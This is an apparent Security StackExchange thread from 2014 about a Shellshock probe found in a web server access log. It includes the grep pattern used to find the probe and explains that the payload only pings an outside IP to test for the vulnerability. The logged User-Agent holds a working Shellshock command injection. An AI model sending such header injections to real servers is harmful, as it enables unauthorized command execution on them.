-7
egrep "};|}\s*;" /var/www/logs/access* 
89.207.135.125 - - [25/Sep/2014:10:47:58 +0200] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 168 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"

How can we shut down the server behind the IP that did this?

somelooser28533
  • 127
  • 4
  • 1
    according to the rules, its not really allowed to ask such questions here, but since you clearly have no idea how to handle this, i awnsered you aanyways, still flagged for closure though – Lighty Sep 26 '14 at 10:24
  • 1
    search for the ip on whois, find out the abuse address, contact those. Most likely the server behind that ip is also a victim. – user10008 Sep 26 '14 at 10:27
  • One of the addresses maps to a .bz (Belize) domain; the other is a Rackspace server. – Mark Sep 26 '14 at 10:30

1 Answers1

4

The log entry you're showing isn't an attack. It's simply a probe to see if you're vulnerable: /bin/ping -c 1 198.101.206.138 means "send a single ICMP echo packet to 198.101.206.138". Further, it only works on systems storing CGI scripts in the non-standard /cgi-sys/ directory, rather than the usual /cgi-bin/.

Mark
  • 34,390
  • 9
  • 85
  • 134
  • 2
    That leaves us with two options: 1. (badguy) someone first probing and then attacking, 2. (good guy) someone wanting to find out how many servers are vulnerable. In the case of 2 however it would be nice to send at least some contact address in the user agent, like [these nice guys](http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html). – user10008 Sep 26 '14 at 10:33